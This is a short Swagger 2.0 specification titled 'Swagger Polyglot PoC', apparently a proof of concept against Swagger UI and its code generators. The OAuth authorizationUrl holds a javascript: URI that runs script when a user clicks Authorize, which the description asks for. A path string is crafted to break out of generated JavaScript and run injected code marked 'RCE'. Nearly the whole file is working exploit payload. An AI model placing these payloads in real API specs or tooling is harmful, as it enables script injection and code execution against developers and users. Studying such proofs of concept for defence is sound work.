swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Swagger Polyglot PoC
  description: Please Click Authorize!
paths:
  "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array(":
    get:
      responses:
        200:
          description: Successful respons
